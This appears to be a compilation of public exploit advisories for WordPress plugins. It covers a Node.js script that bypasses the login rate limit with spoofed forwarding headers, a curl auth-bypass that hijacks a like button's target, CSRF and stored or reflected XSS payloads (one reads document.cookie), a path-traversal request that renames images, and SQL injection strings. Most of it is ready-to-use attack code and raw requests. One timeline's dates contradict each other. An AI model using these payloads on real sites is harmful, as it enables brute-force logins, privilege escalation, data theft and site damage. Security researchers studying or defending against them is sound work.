* to authenticate with WordPress. Plugin has support for HTTP headers
* X_FORWARDED_FOR and X_SUCURI_CLIENTIP to allow rate limiting for users
* when web servers are behind a reverse proxy service.
* However, REMOTE_ADDR is not verified as a whitelisted proxy address, thus
* allowing an attacker to easily forge either the X_FORWARDED_FOR or
* X_SUCURI_CLIENTIP headers to completely bypass the rate limiting service.
*
* PoC
* ---
*/
class LoginRequest
{
constructor(loginUri, numberOfRepititions) {
this._loginUri = loginUri
this._numberOfRepititions = numberOfRepititions
this._count = 0
}
async process() {
await this._sendRequest()
if (this._count++ < this._numberOfRepititions)
this.process()
}
async _sendRequest() {
return new Promise(async (resolve, reject) => {
console.log(`Sending request ${this._count}...`)
request.post({
url : this._loginUri,
form: {
"log": this._getRandomString(),
"pwd": this._getRandomString(),
"wp-submit": "Log+In",
"redirect_to": "/wp-admin/",
"testcookie": "1"
},
headers: {
"X_FORWARDED_FOR": this._getRandomIp()
}
}, (err, res, body) => {
if (err)
console.error(err)
if (body.indexOf("Too many failed") > -1) {
reject("Login was rejected, exploit failed.")
return
}
resolve()
console.log(`\tRequest ${this._count} was not blocked`)
})
})
}
_getRandomString() {
const map = "abcdefghijklmnopqrstuvwxyz0123456789"
const length = Math.floor(Math.random() * 15) + 1
let buffer = ""
for (let i=0; i<length; ++i)
buffer += Math.floor(Math.random() * map.length)
return buffer
}
_getRandomIp() {
const bits = []
for (let x=0; x<4; ++x)
bits.push(Math.floor(Math.random() * 254)) + 1
return bits.join(".")
}
}
if (process.argv.length < 4) {
console.log("Usage: ./bypass-ip-block.js [url] [number_of_repititions]")
console.log("\turl: The url pointing to wp-login.php, (e.g. http://localhost/wp-login.php)")
console.log("\tnumber_of_repititions: The number of login attempts to create (e.g. 500)")
process.exit(1)
}
const session = new LoginRequest(process.argv[2], process.argv[3])
session.process()
Exploit Title: WP Like Button 1.6.0 - Auth Bypass
Date: 05-Jul-19
Exploit Author: Benjamin Lim
Vendor Homepage: http://www.crudlab.com
Software Link: https://wordpress.org/plugins/wp-like-button/
Version: 1.6.0
CVE : CVE-2019-13344
1. Product & Service Introduction:
WP Like button allows you to add Facebook like button on your wordpress
blog. You can also add Share button along with Like button or can add
recommend button. As of now, the plugin has been downloaded 129,089 times
and has 10,000+ active installs.
2. Technical Details & Description:
Authentication Bypass vulnerability in the WP Like Button (Free) plugin
version 1.6.0 allows unauthenticated attackers to change the settings of
the plugin. The contains() function in wp_like_button.php did not check if
the current request is made by an authorized user, thus allowing any
unauthenticated user to successfully update the settings of the plugin.
3. Proof of Concept (PoC):
For example, the curl command below allows an attacker to change the
each_page_url parameter to https://hijack.com. This allows the attacker to
hijack Facebook likes.
curl -k -i --raw -X POST -d
"page=facebook-like-button&site_url=https%%3A%%2F%%2Flocalhost%%2Fwp&display[]=1&display[]=2&display[]=4&display[]=16&mobile=1&fb_app_id=&fb_app_admin=&kd=0&fblb_default_upload_image=&code_snippet=%%3C%%3Fphp+echo+fb_like_button()%%3B+%%3F%%3E&beforeafter=before&eachpage=url&each_page_url=
https://hijack.com&language=en_US&width=65&position=center&layout=box_count&action=like&color=light&btn_size=small&faces=1&share=1&update_fblb="
"https://localhost/wp/wp-admin/admin.php?page=facebook-like-button&edit=1"
-H "Content-Type: application/x-www-form-urlencoded"
4. Mitigation
No update has been released by the vendor. Users are advised to switch to a
different plugin.
5. Disclosure Timeline
2019/06/24 Vendor contacted regarding vulnerability in v1.5.0 (crudlab@gmail.com)
2019/06/30 Second email sent to vendor (crudlab@gmail.com)
2019/07/02 Vendor released v1.6.0 update. Vulnerability still exists.
Vendor did not acknowledge any emails.
2018/07/03 Third email sent to vendor's billing email domain (info@purelogics.net)
2018/07/05 Public disclosure
6. Credits & Authors:
Benjamin Lim - [https://limbenjamin.com]
# Exploit Title: WordPress Plugin LifterLMS 4.21.0 - Stored Cross-Site Scripting (XSS)
# Date: 2021-05-10
# Exploit Author: Captain_hook
# Vendor Homepage: https://lifterlms.com/
# Software Link: https://github.com/gocodebox/lifterlms/releases/tag/4.21.0
# Version: LifterLMS < 4.21.1
# Tested on: ANY
# CVE : CVE-2021-24308
#Summary:
The 'State' field of the Edit profile page of the LMS by LifterLMS – Online Course, Membership & Learning Management System Plugin for WordPress plugin before 4.21.1 is not properly sanitised when output in the About section of the profile page, leading to a stored Cross-Site Scripting issue. This could allow low privilege users (such as students) to elevate their privilege via an XSS attack when an admin will view their profile.
#Proof_of_Concept:
1- As a Lowest Privilege user go to the edit account page of the LMS
(e.g https://example.com/my-courses/edit-account/)
2- Put Your XSS payload in State parameter and save your edits, such
as "><script>alert(/XSS/)</script>
3- The XSS will be stored and triggered in the about section of the profile: (e.g https://example.com/directory/[user_name]/) (Note): The XSS will also be triggered in the admin dashboard when viewing the user details, for example https://example.com/wp-admin/admin.php?page=llms-reporting&tab=students&stab=information&student_id=2
Refernces:
https://github.com/gocodebox/lifterlms/releases/tag/4.21.0
I would like to disclose CSRF and stored XSS vulnerability in Wordpress
plugin LeenkMe version 2.5.0.
The plugin can be found at https://wordpress.org/plugins/leenkme/
In the page wp-content/plugins/leenkme/facebook.php
XSS vulnerable Fields are :
- facebook_message
- facebook_linkname
- facebook_caption
- facebook_description
- default_image
- _wp_http_referer
This CSRF is tested on latest wordpress installation 4.4.2 using firefox
browser.
The Code for CSRF.html is
<html>
<body onload="document.forms['xss'].submit()" >
<form name="xss" action="
http://127.0.0.1/wp/wp-admin/admin.php?page=leenkme_facebook" method="POST">
<input type="hidden" name="facebook_profile" value="on" />
<input type="hidden" name="fb_publish_wpnonce" value="" />
<input type="hidden" name="_wp_http_referer" value="XSS" />
<input type="hidden" name="facebook_message" value="XSS" />
<input type="hidden" name="facebook_linkname" value="XSS" />
<input type="hidden" name="facebook_caption" value="XSS" />
<input type="hidden" name="facebook_description" value="
</textarea><script>prompt();</script>" />
<input type="hidden" name="default_image" value="XSS" />
<input type="hidden" name="message_preference" value="author" />
<input type="hidden" name="clude" value="in" />
<input type="hidden" name="publish_cats[]" value="0" />
<input type="hidden" name="update_facebook_settings"
value="Save Settings" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
The vulnerable page is
wp-content/plugins/leenkme/facebook.php
The vulnerable code producing XSS is
if ( !empty( $_REQUEST['facebook_message'] ) )
$user_settings['facebook_message'] = $_REQUEST['facebook_message'];
else
$user_settings['facebook_message'] = '';
if ( !empty( $_REQUEST['facebook_linkname'] ) )
$user_settings['facebook_linkname'] = $_REQUEST['facebook_linkname'];
else
$user_settings['facebook_linkname'] = '';
if ( !empty( $_REQUEST['facebook_caption'] ) )
$user_settings['facebook_caption'] = $_REQUEST['facebook_caption'];
else
$user_settings['facebook_caption'] = '';
if ( !empty( $_REQUEST['facebook_description'] ) )
$user_settings['facebook_description'] = $_REQUEST['facebook_description'];
-------------------------
-------------------------
-------------------------
snip
------------------------
-------------------------
--------------------------
<td><textarea name="facebook_message" style="width: 500px;"
maxlength="400"><?php
echo $user_settings['facebook_message']; ?></textarea></td>
</tr>
<tr>
<td><?php _e( 'Default Link Name:', 'leenkme'
); ?></td>
<td><input name="facebook_linkname"
type="text" style="width: 500px;" value="<?php echo
$user_settings['facebook_linkname']; ?>" maxlength="100"/></td>
</tr>
<tr>
<td><?php _e( 'Default Caption:', 'leenkme' );
?></td>
<td><input name="facebook_caption"
type="text" style="width: 500px;" value="<?php echo
$user_settings['facebook_caption']; ?>" maxlength="100"/></td>
</tr>
<tr>
<td style='vertical-align: top; padding-top:
5px;'><?php _e( 'Default Description:', 'leenkme' ); ?></td>
<td><textarea name="facebook_description"
style="width: 500px;" maxlength="300"><?php echo
$user_settings['facebook_description']; ?></textarea></td>
The code used to protect against CSRF that is the anti csrf token used is
<?php wp_nonce_field( 'fb_publish', 'fb_publish_wpnonce' ); ?>
But this code is not protecting against the CSRF, the form get submitted
successfully with out any error even though the fb_publish_wpnonce is kept
empty resulting in CSRF vulnerability.
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r
# Exploit Title: WordPress Plugin Learnpress 4.1.4.1 - Arbitrary Image Renaming
# Date: 08-01-2022
# Exploit Author: Ceylan Bozogullarindan
# Author Webpage: https://bozogullarindan.com
# Vendor Homepage: https://thimpress.com/
# Software Link: https://thimpress.com/learnpress-plugin/
# Version: 4.1.4.1
# Tested on: Linux
# CVE: CVE-2022-0377 (https://wpscan.com/vulnerability/0d95ada6-53e3-4a80-a395-eacd7b090f26)
# Description:
LearnPress is a WordPress complete solution for creating a Learning Management System (LMS). It can help you to create courses, lessons and quizzes.
A user of this LMS can upload an image as a profile avatar after the registration. After this process the user crops and saves the image. Then a "POST" request that contains user supplied name of the image is sent to the server for renaming and cropping of the image. As a result of this request, the name of the user-supplied image is changed with a MD5 value. This process can be conducted only when type of the image is JPG or PNG.
An attacker can use this vulnerability in order to rename an arbitrary image file. By doing this, he/she can destroy the design of the web site. Some examples of the malicious actions:
- Destroying of banner of a web site
- Destroying of user avatars
- Destroying of post images
- Destroying of button/app images etc.
# Steps To Reproduce
1. Register and login to the learnpress system.
2. Go to the profile page and upload an avatar image: https://<learnpress-website>/lp-profile/<your-username>/settings/avatar/
3. While saving the image, intercept the POST request by a local proxy tool such as Burpsuite.
4. Change the value of the `lp-user-avatar-crop[name]` parameter to an arbitrary image file path that is in the website (example, /2021/01/image.png or /../../image.png). The path is relative to "/wp-content/uploads/".
5. Forward the intercepted request and check the existence of the image file given in Step 4.
6. You will see that the image can not be found. Because the name of it is renamed.
# PoC - Supported Materials
Request
---------------------------------------------------------------------------
POST /lp-profile/<username>/settings/avatar/?lp-ajax=save-uploaded-user-avatar HTTP/1.1
Host: 127.0.0.1:8000
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 242
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/lp-profile/ceylanb/settings/avatar/
Cookie: _learn_press_session_4411def9d576984c8d78253236b2a62f=4509d5151308952d51776226bb847241%7C%7C1641770556%7C%7C19e385a78349f37ac993a36ecda9c41f; wordpress_lp_cart=1; wordpress_logged_in_4411def9d576984c8d78253236b2a62f=ceylanb%7C1642807471%7CRKS5hU3q1b2G0xY1pkwfl43yVJdIqz9fqBLcknvbyzJ%7C98d337987ee0cbc7539a742e2ebbfbe107d1e0c910c3efd9daa51c4775236e19; LP=%7B%22course-tab%22%3A%22overview%22%7D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
DNT: 1
Sec-GPC: 1
lp-user-avatar-crop%5Bname%5D=%2f..%2f..%2fimage.jpg&lp-user-avatar-crop%5Bwidth%5D=250&lp-user-avatar-crop%5Bheight%5D=250&lp-user-avatar-crop%5Bpoints%5D=0%2C0%2C300%2C300&lp-user-avatar-crop%5Bnonce%5D=8bdc969b07&lp-user-avatar-custom=yes
---------------------------------------------------------------------------
Response
---------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 08 Jan 2022 00:30:11 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <http://127.0.0.1:8000/wp-json/>; rel="https://api.w.org/"
Link: <http://127.0.0.1:8000/wp-json/wp/v2/pages/17>; rel="alternate"; type="application/json"
Link: <http://127.0.0.1:8000/?p=17>; rel=shortlink
Vary: Accept-Encoding
Content-Length: 191
Connection: close
Content-Type: text/html; charset=UTF-8
<-- LP_AJAX_START -->{"success":true,"avatar":"<img src=\"http:\/\/127.0.0.1:8000\/wp-content\/uploads\/learn-press-profile\/2\/f574f3e6594498507333c41af9426d43.jpg\" \/>"}<-- LP_AJAX_END -->
---------------------------------------------------------------------------
# Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.9
# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd
# CVE: CVE-2020-11511
POC:
1. Find out your user id
2. Login with your cred
3. Execute the payload
http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>
# Done!
# Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.8
# References link: https://wpscan.com/vulnerability/10208
# CVE: CVE-2020-6010
POC:
1. Go to url http://<host>/wp-admin
2. Login with a cred
3. Execute the payload
POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 128
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145
type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items¤t_items[]=1 or sleep(1)-- -
# Modify current_items[] as you want
# Exploit Title: Good LMS - Learning Management System WP Plugin SQL
Injection
# Date: 2018-01-24
# Exploit Author: Esecurity.ir
# Exploit Author Web Site: http://esecurity.ir
# Special Thanks : Meisam Monsef [meisamrce@gmail.com] - Telegram ID :
@meisamrce
# Vendor Homepage: https://goodlayers.com/
# Version: All Version
Exploit :
1 - First enter the link below and create an account
http://target.com/?register=1
2 - the exploit
http://target.com/author/[your-username]/?type=scoring-status-student&course_id=-999999+[SQL+Command]%23
http://target.com/author/[your-username]/?type=scoring-status-student&course_id=-999999+union+select+1,2,3,user()%23
# Exploit Title: LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting
# Date: 2020-01-14
# Vendor Homepage: https://www.learndash.com
# Vendor Changelog: https://learndash.releasenotes.io/release/uCskc-version-312
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/reflected-xss-vulnerability-found-in-learndash-lms-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 3.0.0 - 3.1.1
# CVE : CVE-2020-7108
1. Description
LearnDash is one of the most popular and easiest to use WordPress LMS plugins in the market. It allows users to easily create courses and sell them online and boasts a large customer base. The plugin allows users to search for courses they have subscribed to using the [ld_profile] search field, which was found to be vulnerable to reflected cross site scripting. All WordPress websites using LearnDash version 3.0.0 through 3.1.1 are affected.
2. Proof of Concept
Once the user is logged in to the WordPress website where the vulnerable LearnDash plugin is installed, the XSS payload can be inserted into the Search Your Courses box. The payload gets executed because the user input is not properly validated. As a result, passing the XSS payload as a query string in the URL will also execute the payload.
[wordpress website][learndash my-account page]?ld-profile-search=%3Cscript%3Ealert(document.cookie)%3C/script%3E
An attacker can modify the above URL and use an advanced payload that could help him/her in performing malicious actions.
GET /wp-admin/admin-ajax.php?action=ld30_ajax_profile_search&shortcode_instance%5Buser_id%5D=1&shortcode_instance%5Bper_page%5D=20&shortcode_instance%5Border%5D=DESC&shortcode_instance%5Borderby%5D=ID&shortcode_instance%5Bcourse_points_user%5D=yes&shortcode_instance%5Bexpand_all%5D=false&shortcode_instance%5Bprofile_link%5D=true&shortcode_instance%5Bshow_header%5D=yes&shortcode_instance%5Bshow_quizzes%5D=true&shortcode_instance%5Bshow_search%5D=yes&shortcode_instance%5Bquiz_num%5D=20&shortcode_instance%5Bpaged%5D=1&shortcode_instance%5Bs%5D=&ld-profile-search=%3Cscript%3Ealert(123)%3C%2Fscript%3E HTTP/1.1
Host: learndashtesting.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://learndashtesting.com/my-account-2/
Cookie: wordpress_bcfe62773b0917e2688ccaecd96abe61=jinson%7C1581504173%7CeztvQWuKhSrnfkyEkwN0TvUU4CuVBpuyXeGErewuFOv%7C7ec9ebfd67acdbc669395821f620198e67cb74780c9a8db63923b528aa661acd; PHPSESSID=e7c30849dbdab6f1cafcccef0ad7e7a0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcfe62773b0917e2688ccaecd96abe61=jinson%7C1581504173%7CeztvQWuKhSrnfkyEkwN0TvUU4CuVBpuyXeGErewuFOv%7Cfcf64acbc9b6ba7aaafb9c3b077581347d65ca8e010135cc232dcfc0335ec6d8; wordpress_cf_adm_use_adm=1; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg; wp-settings-time-1=1581331685
3. Timeline
Vulnerability reported to the LearnDash team – January 14, 2020
LearnDash version 3.1.2 containing the fix released – January 14, 2020